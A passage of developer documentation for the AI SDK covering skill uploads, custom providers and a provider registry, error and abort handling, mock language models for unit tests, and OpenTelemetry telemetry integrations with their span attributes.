      path: 'my-skill/helper.py',
      content: readFileSync('./helper.py'),
    },
  ],
});

Upload Result

uploadSkill returns an UploadSkillResult with the following fields:

Field	Type	Description
`providerReference`	`ProviderReference`	Maps provider names to provider-specific skill IDs
`displayTitle`	`string?`	Human-readable title (if supported and provided)
`name`	`string?`	Name inferred by the provider from the skill files
`description`	`string?`	Description inferred by the provider from the skill files
`latestVersion`	`string?`	Latest version identifier assigned by the provider
`providerMetadata`	`object?`	Additional provider-specific metadata (e.g. timestamps)
`warnings`	`Warning[]`	Warnings for unsupported options (e.g. `displayTitle` on OpenAI)

Provider References

A ProviderReference is a Record<string, string> mapping provider names to provider-specific skill identifiers:

// Example ProviderReference
{
  anthropic: 'skill_abc123',
}

Pass the providerReference when referencing the skill during inference. Each provider looks up its own skill ID from the reference. If no entry exists for the current provider, an error is thrown.

Multi-Provider Usage

If you want to use the same skill across multiple providers, upload it to each one and merge the references:

const [openaiUpload, anthropicUpload] = await Promise.all([
  uploadSkill({
    api: openai.skills(),
    files: [{ path: 'my-skill/SKILL.md', content: skillSource }],
  }),
  uploadSkill({
    api: anthropic.skills(),
    files: [{ path: 'my-skill/SKILL.md', content: skillSource }],
    displayTitle: 'My Skill',
  }),
]);

const mergedReference = {
  ...openaiUpload.providerReference,
  ...anthropicUpload.providerReference,
};

// mergedReference: { openai: 'sk_...', anthropic: 'sk_...' }

The merged reference can then be used in inference calls regardless of which provider processes the request — each provider will find its own skill ID.

Using Skills in Inference Calls

How you attach a skill to an inference call depends on the provider.

Anthropic

Pass the providerReference inside the container.skills array in providerOptions:

await generateText({
  model: anthropic('claude-sonnet-4-6'),
  tools: {
    code_execution: anthropic.tools.codeExecution_20260120(),
  },
  prompt: '...',
  providerOptions: {
    anthropic: {
      container: {
        skills: [{ type: 'custom', providerReference }],
      },
    } satisfies AnthropicLanguageModelOptions,
  },
});

OpenAI

Pass the providerReference inside the shell tool's environment.skills array:

await generateText({
  model: openai.responses('gpt-5.2'),
  tools: {
    shell: openai.tools.shell({
      environment: {
        type: 'containerAuto',
        skills: [{ type: 'skillReference', providerReference }],
      },
    }),
  },
  prompt: '...',
});

Supported Providers

The following providers support skills() and skill uploads:

Provider	Factory Method
Anthropic	`anthropic.skills()`
OpenAI	`openai.skills()`

title: Provider & Model Management description: Learn how to work with multiple providers and models

Provider & Model Management

When you work with multiple providers and models, it is often desirable to manage them in a central place and access the models through simple string ids.

The AI SDK offers custom providers and a provider registry for this purpose:

With custom providers, you can pre-configure model settings, provide model name aliases, and limit the available models.
The provider registry lets you mix multiple providers and access them through simple string ids.

You can mix and match custom providers, the provider registry, and middleware in your application.

Custom Providers

You can create a custom provider using customProvider.

Example: custom model settings

You might want to override the default model settings for a provider or provide model name aliases with pre-configured settings.

import {
  gateway,
  customProvider,
  defaultSettingsMiddleware,
  wrapLanguageModel,
} from 'ai';

// custom provider with different provider options:
export const openai = customProvider({
  languageModels: {
    // replacement model with custom provider options:
    'gpt-5.1': wrapLanguageModel({
      model: gateway('openai/gpt-5.1'),
      middleware: defaultSettingsMiddleware({
        settings: {
          providerOptions: {
            openai: {
              reasoningEffort: 'high',
            },
          },
        },
      }),
    }),
    // alias model with custom provider options:
    'gpt-5.1-high-reasoning': wrapLanguageModel({
      model: gateway('openai/gpt-5.1'),
      middleware: defaultSettingsMiddleware({
        settings: {
          providerOptions: {
            openai: {
              reasoningEffort: 'high',
            },
          },
        },
      }),
    }),
  },
  fallbackProvider: gateway,
});

Example: model name alias

You can also provide model name aliases, so you can update the model version in one place in the future:

import { customProvider, gateway } from 'ai';

// custom provider with alias names:
export const anthropic = customProvider({
  languageModels: {
    opus: gateway('anthropic/claude-opus-4.1'),
    sonnet: gateway('anthropic/claude-sonnet-4.5'),
    haiku: gateway('anthropic/claude-haiku-4.5'),
  },
  fallbackProvider: gateway,
});

Example: limit available models

You can limit the available models in the system, even if you have multiple providers.

import {
  customProvider,
  defaultSettingsMiddleware,
  wrapLanguageModel,
  gateway,
} from 'ai';

export const myProvider = customProvider({
  languageModels: {
    'text-medium': gateway('anthropic/claude-3-5-sonnet-20240620'),
    'text-small': gateway('openai/gpt-5-mini'),
    'reasoning-medium': wrapLanguageModel({
      model: gateway('openai/gpt-5.1'),
      middleware: defaultSettingsMiddleware({
        settings: {
          providerOptions: {
            openai: {
              reasoningEffort: 'high',
            },
          },
        },
      }),
    }),
    'reasoning-fast': wrapLanguageModel({
      model: gateway('openai/gpt-5.1'),
      middleware: defaultSettingsMiddleware({
        settings: {
          providerOptions: {
            openai: {
              reasoningEffort: 'low',
            },
          },
        },
      }),
    }),
  },
  embeddingModels: {
    embedding: gateway.embeddingModel('openai/text-embedding-3-small'),
  },
  // no fallback provider
});

Example: files and skills interfaces

You can attach a provider's files or skills interface to your custom provider. This allows you to use uploadFile and uploadSkill through the same provider abstraction.

import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { customProvider, uploadFile, uploadSkill } from 'ai';

// custom provider with files interface:
const myOpenAI = customProvider({
  languageModels: {
    'gpt-4o-mini': openai.responses('gpt-4o-mini'),
  },
  files: openai.files(),
});

// custom provider with skills interface:
const myAnthropic = customProvider({
  languageModels: {
    sonnet: anthropic('claude-sonnet-4-5'),
  },
  skills: anthropic.skills(),
});

// usage:
await uploadFile({ api: myOpenAI.files!(), data: fileData, filename: 'image.png' });
await uploadSkill({ api: myAnthropic.skills!(), files: skillFiles, displayTitle: 'My Skill' });

If no files or skills option is set but a fallbackProvider is configured, the custom provider will inherit those interfaces from the fallback.

Provider Registry

You can create a provider registry with multiple providers and models using createProviderRegistry.

Setup

import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { createProviderRegistry, gateway } from 'ai';

export const registry = createProviderRegistry({
  // register provider with prefix and default setup using gateway:
  gateway,

  // register provider with prefix and direct provider import:
  anthropic,
  openai,
});

Setup with Custom Separator

By default, the registry uses : as the separator between provider and model IDs. You can customize this separator:

import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { createProviderRegistry, gateway } from 'ai';

export const customSeparatorRegistry = createProviderRegistry(
  {
    gateway,
    anthropic,
    openai,
  },
  { separator: ' > ' },
);

Example: Use language models

You can access language models by using the languageModel method on the registry. The provider id will become the prefix of the model id: providerId:modelId.

import { generateText } from 'ai';
import { registry } from './registry';

const { text } = await generateText({
  model: registry.languageModel('openai:gpt-5.1'), // default separator
  // or with custom separator:
  // model: customSeparatorRegistry.languageModel('openai > gpt-5.1'),
  prompt: 'Invent a new holiday and describe its traditions.',
});

Example: Use text embedding models

You can access text embedding models by using the .embeddingModel method on the registry. The provider id will become the prefix of the model id: providerId:modelId.

import { embed } from 'ai';
import { registry } from './registry';

const { embedding } = await embed({
  model: registry.embeddingModel('openai:text-embedding-3-small'),
  value: 'sunny day at the beach',
});

Example: Use image models

You can access image models by using the imageModel method on the registry. The provider id will become the prefix of the model id: providerId:modelId.

import { generateImage } from 'ai';
import { registry } from './registry';

const { image } = await generateImage({
  model: registry.imageModel('openai:dall-e-3'),
  prompt: 'A beautiful sunset over a calm ocean',
});

Example: Use video models

You can access video models by using the videoModel method on the registry. The provider id will become the prefix of the model id: providerId:modelId.

import { experimental_generateVideo } from 'ai';
import { fal } from '@ai-sdk/fal';
import { createProviderRegistry } from 'ai';

const registry = createProviderRegistry({ fal });

const { videos } = await experimental_generateVideo({
  model: registry.videoModel('fal:luma-dream-machine/ray-2'),
  prompt: 'A cat walking on a beach at sunset',
});

Example: Use files interface

You can access a provider's files interface by calling registry.files(providerId). This is useful when you want to upload files through a provider in the registry before referencing them in model requests.

import { openai } from '@ai-sdk/openai';
import { createProviderRegistry, customProvider, generateText, uploadFile } from 'ai';

const registry = createProviderRegistry({
  openai: customProvider({
    languageModels: { 'gpt-4o-mini': openai.responses('gpt-4o-mini') },
    files: openai.files(),
  }),
});

const { providerReference } = await uploadFile({
  api: registry.files('openai'),
  data: fileData,
  filename: 'image.png',
});

const { text } = await generateText({
  model: registry.languageModel('openai:gpt-4o-mini'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Describe what you see in this image.' },
        { type: 'image', image: providerReference },
      ],
    },
  ],
});

Example: Use skills interface

You can access a provider's skills interface by calling registry.skills(providerId).

import { anthropic } from '@ai-sdk/anthropic';
import { createProviderRegistry, customProvider, uploadSkill } from 'ai';

const registry = createProviderRegistry({
  anthropic: customProvider({
    languageModels: { sonnet: anthropic('claude-sonnet-4-5') },
    skills: anthropic.skills(),
  }),
});

await uploadSkill({
  api: registry.skills('anthropic'),
  files: skillFiles,
  displayTitle: 'My Skill',
});

Combining Custom Providers, Provider Registry, and Middleware

Here is an example that implements the following concepts:

pass through gateway with a namespace prefix (here: gateway > *)
pass through a full provider with a namespace prefix (here: xai > *)
setup an OpenAI-compatible provider with custom api key and base URL (here: custom > *)
setup model name aliases (here: anthropic > fast, anthropic > writing, anthropic > reasoning)
pre-configure model settings (here: anthropic > reasoning)
validate the provider-specific options (here: AnthropicLanguageModelOptions)
use a fallback provider (here: anthropic > *)
limit a provider to certain models without a fallback (here: groq > gemma2-9b-it, groq > qwen-qwq-32b)
define a custom separator for the provider registry (here: >)

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { xai } from '@ai-sdk/xai';
import { groq } from '@ai-sdk/groq';
import {
  createProviderRegistry,
  customProvider,
  defaultSettingsMiddleware,
  gateway,
  wrapLanguageModel,
} from 'ai';

export const registry = createProviderRegistry(
  {
    // pass through gateway with a namespace prefix
    gateway,

    // pass through full providers with namespace prefixes
    xai,

    // access an OpenAI-compatible provider with custom setup
    custom: createOpenAICompatible({
      name: 'provider-name',
      apiKey: process.env.CUSTOM_API_KEY,
      baseURL: 'https://api.custom.com/v1',
    }),

    // setup model name aliases
    anthropic: customProvider({
      languageModels: {
        fast: anthropic('claude-haiku-4-5'),

        // simple model
        writing: anthropic('claude-sonnet-4-5'),

        // extended reasoning model configuration:
        reasoning: wrapLanguageModel({
          model: anthropic('claude-sonnet-4-5'),
          middleware: defaultSettingsMiddleware({
            settings: {
              maxOutputTokens: 100000, // example default setting
              providerOptions: {
                anthropic: {
                  thinking: {
                    type: 'enabled',
                    budgetTokens: 32000,
                  },
                } satisfies AnthropicLanguageModelOptions,
              },
            },
          }),
        }),
      },
      fallbackProvider: anthropic,
    }),

    // limit a provider to certain models without a fallback
    groq: customProvider({
      languageModels: {
        'gemma2-9b-it': groq('gemma2-9b-it'),
        'qwen-qwq-32b': groq('qwen-qwq-32b'),
      },
    }),
  },
  { separator: ' > ' },
);

// usage:
const model = registry.languageModel('anthropic > reasoning');

Global Provider Configuration

The AI SDK 5 includes a global provider feature that allows you to specify a model using just a plain model ID string:

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = await streamText({
  model: __MODEL__, // Uses the global provider (defaults to gateway)
  prompt: 'Invent a new holiday and describe its traditions.',
});

By default, the global provider is set to the Vercel AI Gateway.

Customizing the Global Provider

You can set your own preferred global provider:

import { openai } from '@ai-sdk/openai';

// Initialize once during startup:
globalThis.AI_SDK_DEFAULT_PROVIDER = openai;

import { streamText } from 'ai';

const result = await streamText({
  model: 'gpt-5.1', // Uses OpenAI provider without prefix
  prompt: 'Invent a new holiday and describe its traditions.',
});

This simplifies provider usage and makes it easier to switch between providers without changing your model references throughout your codebase.

title: Error Handling description: Learn how to handle errors in the AI SDK Core

Error Handling

Handling regular errors

Regular errors are thrown and can be handled using the try/catch block.

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

try {
  const { text } = await generateText({
    model: __MODEL__,
    prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  });
} catch (error) {
  // handle error
}

See Error Types for more information on the different types of errors that may be thrown.

Handling streaming errors (simple streams)

When errors occur during streams that do not support error chunks, the error is thrown as a regular error. You can handle these errors using the try/catch block.

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

try {
  const { textStream } = streamText({
    model: __MODEL__,
    prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  });

  for await (const textPart of textStream) {
    process.stdout.write(textPart);
  }
} catch (error) {
  // handle error
}

Handling streaming errors (streaming with `error` support)

Full streams support error parts. You can handle those parts similar to other parts. It is recommended to also add a try-catch block for errors that happen outside of the streaming.

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

try {
  const { fullStream } = streamText({
    model: __MODEL__,
    prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  });

  for await (const part of fullStream) {
    switch (part.type) {
      // ... handle other part types

      case 'error': {
        const error = part.error;
        // handle error
        break;
      }

      case 'abort': {
        // handle stream abort
        break;
      }

      case 'tool-error': {
        const error = part.error;
        // handle error
        break;
      }
    }
  }
} catch (error) {
  // handle error
}

Handling stream aborts

When streams are aborted (e.g., via chat stop button), you may want to perform cleanup operations like updating stored messages in your UI. Use the onAbort callback to handle these cases.

The onAbort callback is called when a stream is aborted via AbortSignal, but onFinish is not called. This ensures you can still update your UI state appropriately.

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const { textStream } = streamText({
  model: __MODEL__,
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  onAbort: ({ steps }) => {
    // Update stored messages or perform cleanup
    console.log('Stream aborted after', steps.length, 'steps');
  },
  onFinish: ({ steps, totalUsage }) => {
    // This is called on normal completion
    console.log('Stream completed normally');
  },
});

for await (const textPart of textStream) {
  process.stdout.write(textPart);
}

The onAbort callback receives:

steps: An array of all completed steps before the abort

You can also handle abort events directly in the stream:

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const { fullStream } = streamText({
  model: __MODEL__,
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

for await (const chunk of fullStream) {
  switch (chunk.type) {
    case 'abort': {
      // Handle abort directly in stream
      console.log('Stream was aborted');
      break;
    }
    // ... handle other part types
  }
}

title: Testing description: Learn how to use AI SDK Core mock providers for testing.

Testing

Testing language models can be challenging, because they are non-deterministic and calling them is slow and expensive.

To enable you to unit test your code that uses the AI SDK, the AI SDK Core includes mock providers and test helpers. You can import the following helpers from ai/test:

MockEmbeddingModelV4: A mock embedding model using the embedding model v4 specification.
MockLanguageModelV4: A mock language model using the language model v4 specification.
mockId: Provides an incrementing integer ID.
mockValues: Iterates over an array of values with each call. Returns the last value when the array is exhausted.

You can also import simulateReadableStream from ai to simulate a readable stream with delays.

With mock providers and test helpers, you can control the output of the AI SDK and test your code in a repeatable and deterministic way without actually calling a language model provider.

Examples

You can use the test helpers with the AI Core functions in your unit tests:

generateText

import { generateText } from 'ai';
import { MockLanguageModelV4 } from 'ai/test';

const result = await generateText({
  model: new MockLanguageModelV4({
    doGenerate: async () => ({
      content: [{ type: 'text', text: `Hello, world!` }],
      finishReason: { unified: 'stop', raw: undefined },
      usage: {
        inputTokens: {
          total: 10,
          noCache: 10,
          cacheRead: undefined,
          cacheWrite: undefined,
        },
        outputTokens: {
          total: 20,
          text: 20,
          reasoning: undefined,
        },
      },
      warnings: [],
    }),
  }),
  prompt: 'Hello, test!',
});

streamText

import { streamText, simulateReadableStream } from 'ai';
import { MockLanguageModelV4 } from 'ai/test';

const result = streamText({
  model: new MockLanguageModelV4({
    doStream: async () => ({
      stream: simulateReadableStream({
        chunks: [
          { type: 'text-start', id: 'text-1' },
          { type: 'text-delta', id: 'text-1', delta: 'Hello' },
          { type: 'text-delta', id: 'text-1', delta: ', ' },
          { type: 'text-delta', id: 'text-1', delta: 'world!' },
          { type: 'text-end', id: 'text-1' },
          {
            type: 'finish',
            finishReason: { unified: 'stop', raw: undefined },
            logprobs: undefined,
            usage: {
              inputTokens: {
                total: 3,
                noCache: 3,
                cacheRead: undefined,
                cacheWrite: undefined,
              },
              outputTokens: {
                total: 10,
                text: 10,
                reasoning: undefined,
              },
            },
          },
        ],
      }),
    }),
  }),
  prompt: 'Hello, test!',
});

generateText with Output

import { generateText, Output } from 'ai';
import { MockLanguageModelV4 } from 'ai/test';
import { z } from 'zod';

const result = await generateText({
  model: new MockLanguageModelV4({
    doGenerate: async () => ({
      content: [{ type: 'text', text: `{"content":"Hello, world!"}` }],
      finishReason: { unified: 'stop', raw: undefined },
      usage: {
        inputTokens: {
          total: 10,
          noCache: 10,
          cacheRead: undefined,
          cacheWrite: undefined,
        },
        outputTokens: {
          total: 20,
          text: 20,
          reasoning: undefined,
        },
      },
      warnings: [],
    }),
  }),
  output: Output.object({ schema: z.object({ content: z.string() }) }),
  prompt: 'Hello, test!',
});

streamText with Output

import { streamText, Output, simulateReadableStream } from 'ai';
import { MockLanguageModelV4 } from 'ai/test';
import { z } from 'zod';

const result = streamText({
  model: new MockLanguageModelV4({
    doStream: async () => ({
      stream: simulateReadableStream({
        chunks: [
          { type: 'text-start', id: 'text-1' },
          { type: 'text-delta', id: 'text-1', delta: '{ ' },
          { type: 'text-delta', id: 'text-1', delta: '"content": ' },
          { type: 'text-delta', id: 'text-1', delta: `"Hello, ` },
          { type: 'text-delta', id: 'text-1', delta: `world` },
          { type: 'text-delta', id: 'text-1', delta: `!"` },
          { type: 'text-delta', id: 'text-1', delta: ' }' },
          { type: 'text-end', id: 'text-1' },
          {
            type: 'finish',
            finishReason: { unified: 'stop', raw: undefined },
            logprobs: undefined,
            usage: {
              inputTokens: {
                total: 3,
                noCache: 3,
                cacheRead: undefined,
                cacheWrite: undefined,
              },
              outputTokens: {
                total: 10,
                text: 10,
                reasoning: undefined,
              },
            },
          },
        ],
      }),
    }),
  }),
  output: Output.object({ schema: z.object({ content: z.string() }) }),
  prompt: 'Hello, test!',
});

Simulate UI Message Stream Responses

You can also simulate UI Message Stream responses for testing, debugging, or demonstration purposes.

Here is a Next example:

import { simulateReadableStream } from 'ai';

export async function POST(req: Request) {
  return new Response(
    simulateReadableStream({
      initialDelayInMs: 1000, // Delay before the first chunk
      chunkDelayInMs: 300, // Delay between chunks
      chunks: [
        `data: {"type":"start","messageId":"msg-123"}\n\n`,
        `data: {"type":"text-start","id":"text-1"}\n\n`,
        `data: {"type":"text-delta","id":"text-1","delta":"This"}\n\n`,
        `data: {"type":"text-delta","id":"text-1","delta":" is an"}\n\n`,
        `data: {"type":"text-delta","id":"text-1","delta":" example."}\n\n`,
        `data: {"type":"text-end","id":"text-1"}\n\n`,
        `data: {"type":"finish"}\n\n`,
        `data: [DONE]\n\n`,
      ],
    }).pipeThrough(new TextEncoderStream()),
    {
      status: 200,
      headers: {
        'Content-Type': 'text/event-stream',
        'Cache-Control': 'no-cache',
        Connection: 'keep-alive',
        'x-vercel-ai-ui-message-stream': 'v1',
      },
    },
  );
}

title: Telemetry description: Using OpenTelemetry with AI SDK Core

Telemetry

The AI SDK uses OpenTelemetry to collect telemetry data. OpenTelemetry is an open-source observability framework designed to provide standardized instrumentation for collecting telemetry data.

Check out the AI SDK Observability Integrations to see providers that offer monitoring and tracing for AI SDK applications.

Enabling telemetry

Step 1: Register the OpenTelemetry integration

OpenTelemetry span collection requires the @ai-sdk/otel package. Install it and register the integration once at application startup:

pnpm install @ai-sdk/otel

import { registerTelemetryIntegration } from 'ai';
import { OpenTelemetryIntegration } from '@ai-sdk/otel';

registerTelemetryIntegration(new OpenTelemetryIntegration());

For Next.js applications, place this in your instrumentation.ts file alongside your OpenTelemetry provider setup. See the Next.js OpenTelemetry guide for more details on setting up the provider.

For Node.js applications (without Next.js), register the integration at the top level of your entry file.

Step 2: Enabling Telemetry

Once a telemetry integration is registered, all AI SDK calls emit telemetry events by default. You can still pass telemetry to attach metadata (like functionId) or to opt out of a specific call:

const result = await generateText({
  model: __MODEL__,
  prompt: 'Write a short story about a cat.',
  telemetry: {
    functionId: `story-agent`,
  },
});

By default, both inputs and outputs are recorded. You can disable them by setting the recordInputs and recordOutputs options to false.

Opting out

Telemetry is opt-out. To disable telemetry for a specific call, set isEnabled: false:

const result = await generateText({
  model: __MODEL__,
  prompt: 'Write a short story about a cat.',
  telemetry: { isEnabled: false },
});

To disable telemetry globally, do not register any telemetry integrations via the registerTelemetryIntegration() function.

Telemetry Metadata

You can provide a functionId to identify the function that the telemetry data is for, and runtimeContext to include additional information in the telemetry data.

const result = await generateText({
  model: __MODEL__,
  prompt: 'Write a short story about a cat.',
  runtimeContext: {
    something: 'custom',
    someOtherThing: 'other-value',
  },
  telemetry: {
    functionId: 'my-awesome-function',
  },
});

Custom Tracer

If you want your traces to use a TracerProvider other than the one provided by the @opentelemetry/api singleton, pass a custom Tracer to the OpenTelemetryIntegration constructor:

import { registerTelemetryIntegration } from 'ai';
import { OpenTelemetryIntegration } from '@ai-sdk/otel';

const tracerProvider = new NodeTracerProvider();
registerTelemetryIntegration(
  new OpenTelemetryIntegration({
    tracer: tracerProvider.getTracer('ai'),
  }),
);

The GenAIOpenTelemetryIntegration also accepts a custom Tracer in the same way.

Telemetry Integrations

The GenAIOpenTelemetryIntegration and OpenTelemetryIntegration from @ai-sdk/otel are the built-in integrations for collecting OpenTelemetry spans (see Enabling telemetry above).

Registering integrations globally

Use registerTelemetryIntegration to register an integration once for all AI SDK calls:

import { registerTelemetryIntegration } from 'ai';
import { OpenTelemetryIntegration } from '@ai-sdk/otel';

registerTelemetryIntegration(new OpenTelemetryIntegration());

You can also register multiple integrations in a single call by passing them as additional arguments. They all receive the same lifecycle events:

import { registerTelemetryIntegration } from 'ai';
import { OpenTelemetryIntegration } from '@ai-sdk/otel';
import { DevToolsTelemetry } from '@ai-sdk/devtools';

registerTelemetryIntegration(
  new OpenTelemetryIntegration(),
  DevToolsTelemetry(),
);

Per-call integrations

You can also pass one or more integrations to individual generateText or streamText calls. When per-call integrations are provided, they replace the globally registered integrations for that call:

import { streamText } from 'ai';
import { DevToolsTelemetry } from '@ai-sdk/devtools';

const result = streamText({
  model: openai('gpt-4o'),
  prompt: 'Hello!',
  telemetry: {
    integrations: [DevToolsTelemetry()],
  },
});

You can combine multiple integrations — they all receive the same lifecycle events:

telemetry: {
  integrations: [DevToolsTelemetry(), customLogger()],
},

Errors inside integrations are caught and do not break the generation flow.

Building a custom integration

Implement the TelemetryIntegration interface from the ai package. All methods are optional — implement only the lifecycle events you care about:

import type { TelemetryIntegration } from 'ai';

class MyIntegration implements TelemetryIntegration {
  async onStart(event) {
    console.log('Generation started:', event.model.modelId);
  }

  async onStepFinish(event) {
    console.log(
      `Step ${event.stepNumber} done:`,
      event.usage.totalTokens,
      'tokens',
    );
  }

  async onToolExecutionEnd(event) {
    if (event.success) {
      console.log(
        `Tool "${event.toolCall.toolName}" took ${event.durationMs}ms`,
      );
    } else {
      console.error(`Tool "${event.toolCall.toolName}" failed:`, event.error);
    }
  }

  async onFinish(event) {
    console.log('Done. Total tokens:', event.totalUsage.totalTokens);
  }
}

export function myIntegration(): TelemetryIntegration {
  return new MyIntegration();
}

Available lifecycle methods

<PropertiesTable content={[ { name: 'onStart', type: '(event: OnStartEvent) => void | PromiseLike', description: 'Called when the generation operation begins, before any LLM calls.', }, { name: 'onStepStart', type: '(event: OnStepStartEvent) => void | PromiseLike', description: 'Called when a step (LLM call) begins, before the provider is called.', }, { name: 'onToolExecutionStart', type: '(event: ToolExecutionStartEvent) => void | PromiseLike', description: "Called when a tool's execute function is about to run.", }, { name: 'onToolExecutionEnd', type: '(event: ToolExecutionEndEvent) => void | PromiseLike', description: "Called when a tool's execute function completes or errors.", }, { name: 'onStepFinish', type: '(event: OnStepFinishEvent) => void | PromiseLike', description: 'Called when a step (LLM call) completes.', }, { name: 'onFinish', type: '(event: OnFinishEvent) => void | PromiseLike', description: 'Called when the entire generation completes (all steps finished).', }, ]} />

The event types for each method are the same as the corresponding event callbacks. See the event callbacks documentation for the full property reference of each event.

Collected Data

The @ai-sdk/otel package provides two integrations that emit different span formats. The GenAIOpenTelemetryIntegration follows the OpenTelemetry GenAI Semantic Conventions and is the recommended integration. The OpenTelemetryIntegration emits legacy AI SDK-specific spans.

GenAI Semantic Conventions

The GenAIOpenTelemetryIntegration emits spans that follow the OpenTelemetry Semantic Conventions for GenAI. All attributes use the gen_ai.* prefix. Provider names are mapped to well-known values (e.g. openai, anthropic, gcp.vertex_ai).

generateText / streamText

For generateText and streamText, the integration records 3 types of spans:

invoke_agent {modelId} (root span, INTERNAL): covers the full operation including all steps and tool calls.

Initial attributes:
- gen_ai.operation.name: "invoke_agent"
- gen_ai.provider.name: the provider (e.g. "openai", "anthropic")
- gen_ai.request.model: the requested model ID
- gen_ai.agent.name: the functionId from telemetry settings
- gen_ai.system_instructions: system instructions formatted as a JSON array of parts (when recordInputs is enabled)
- gen_ai.input.messages: the input messages in GenAI SemConv message format (when recordInputs is enabled)
- gen_ai.request.temperature: the temperature setting
- gen_ai.request.max_tokens: the maximum output tokens
- gen_ai.request.top_p: the topP setting
- gen_ai.request.top_k: the topK setting
- gen_ai.request.frequency_penalty: the frequency penalty
- gen_ai.request.presence_penalty: the presence penalty
- gen_ai.request.stop_sequences: the stop sequences
- gen_ai.request.seed: the seed value
Attributes set on finish:
- gen_ai.response.finish_reasons: array of finish reasons (e.g. ["stop"], ["tool_call"])
- gen_ai.usage.input_tokens: the number of input tokens used
- gen_ai.usage.output_tokens: the number of output tokens used
- gen_ai.usage.cache_read.input_tokens: cached input tokens read
- gen_ai.usage.cache_creation.input_tokens: cached input tokens created
- gen_ai.output.messages: the output in GenAI SemConv message format (when recordOutputs is enabled)
chat {modelId} (step span, CLIENT): one span per LLM provider call, nested under the root span.

Initial attributes:
- gen_ai.operation.name: "chat"
- gen_ai.provider.name: the provider
- gen_ai.request.model: the requested model ID
- gen_ai.request.temperature, gen_ai.request.max_tokens, gen_ai.request.top_p, gen_ai.request.top_k, gen_ai.request.frequency_penalty, gen_ai.request.presence_penalty, gen_ai.request.stop_sequences: request parameters
- gen_ai.input.messages: the prompt messages in GenAI SemConv message format (when recordInputs is enabled)
- gen_ai.tool.definitions: the tool definitions as stringified JSON (when recordInputs is enabled)
Attributes set on finish:
- gen_ai.response.finish_reasons: array of finish reasons
- gen_ai.response.id: the response ID from the provider
- gen_ai.response.model: the model that generated the response (may differ from the requested model)
- gen_ai.usage.input_tokens: input tokens used in this step
- gen_ai.usage.output_tokens: output tokens used in this step
- gen_ai.usage.cache_read.input_tokens: cached input tokens read
- gen_ai.usage.cache_creation.input_tokens: cached input tokens created
- gen_ai.output.messages: the output in GenAI SemConv message format (when recordOutputs is enabled)
execute_tool {toolName} (tool span, INTERNAL): one span per tool execution, nested under the step span. See GenAI tool call spans for details.

Deprecated object APIs (generateObject / streamObject)

The deprecated object APIs emit the same span hierarchy as generateText/streamText with these additional attributes on the root span:

gen_ai.output.type: "json"

The step spans also include gen_ai.output.type: "json", and gen_ai.output.messages contains the generated object as a text part.

embed / embedMany

For embed and embedMany, the integration records spans with CLIENT kind:

embeddings {modelId} (root span): covers the full embedding operation.

Initial attributes:
- gen_ai.operation.name: "embeddings"
- gen_ai.provider.name: the provider
- gen_ai.request.model: the requested model ID
Attributes set on finish:
- gen_ai.usage.input_tokens: the number of tokens used
embeddings {modelId} (inner span, embedMany only): one span per provider batch call, nested under the root span.

Initial attributes:
- gen_ai.operation.name: "embeddings"
- gen_ai.provider.name: the provider
- gen_ai.request.model: the model ID
Attributes set on finish:
- gen_ai.usage.input_tokens: the number of tokens used

rerank

For rerank, the integration records spans with CLIENT kind:

rerank {modelId} (root span): covers the full rerank operation.

Initial attributes:
- gen_ai.operation.name: "rerank"
- gen_ai.provider.name: the provider
- gen_ai.request.model: the requested model ID
rerank {modelId} (inner span): one span per provider rerank call, nested under the root span.

Initial attributes:
- gen_ai.operation.name: "rerank"
- gen_ai.provider.name: the provider
- gen_ai.request.model: the model ID

GenAI span details

GenAI message format

The gen_ai.input.messages and gen_ai.output.messages attributes follow the OpenTelemetry GenAI Semantic Conventions message format. Messages are JSON arrays of objects with a role and a parts array. Each part has a type and type-specific fields:

text: { type: "text", content: "..." }
reasoning: { type: "reasoning", content: "..." }
tool_call: { type: "tool_call", id: "...", name: "...", arguments: ... }
tool_call_response: { type: "tool_call_response", id: "...", response: ... }
blob: { type: "blob", modality: "image"|"video"|"audio", mime_type: "...", content: "..." } (base64-encoded)
uri: { type: "uri", modality: "image"|"video"|"audio", mime_type: "...", uri: "..." } (for URL-based files)

Output messages also include a finish_reason field (e.g. "stop", "tool_call", "length", "content_filter").

System instructions are recorded separately in gen_ai.system_instructions as a JSON array of { type: "text", content: "..." } parts.

GenAI tool call spans

Tool call spans (execute_tool {toolName}) are nested under the step span and contain:

gen_ai.operation.name: "execute_tool"
gen_ai.tool.name: the name of the tool
gen_ai.tool.call.id: the tool call ID
gen_ai.tool.type: "function"
gen_ai.tool.call.arguments: the input arguments (stringified JSON, when recordInputs is enabled)
gen_ai.tool.call.result: the output result (stringified JSON, when recordOutputs is enabled). Only set when the tool call succeeds.

Legacy AI SDK Spans (`OpenTelemetryIntegration`)

The OpenTelemetryIntegration emits spans using AI SDK-specific ai.* prefixed attributes. This is the legacy format. Consider migrating to the GenAIOpenTelemetryIntegration for better compatibility with observability platforms.

generateText function

generateText records 3 types of spans:

ai.generateText (span): the full length of the generateText call. It contains 1 or more ai.generateText.doGenerate spans. It contains the basic LLM span information and the following attributes:
- operation.name: ai.generateText and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.generateText"
- ai.prompt: the prompt that was used when calling generateText
- ai.response.text: the text that was generated
- ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
- ai.response.finishReason: the reason why the generation finished
- ai.settings.maxOutputTokens: the maximum number of output tokens that were set
ai.generateText.doGenerate (span): a provider doGenerate call. It can contain ai.toolCall spans. It contains the call LLM span information and the following attributes:
- operation.name: ai.generateText.doGenerate and the functionId that was set through telemetry.functionId
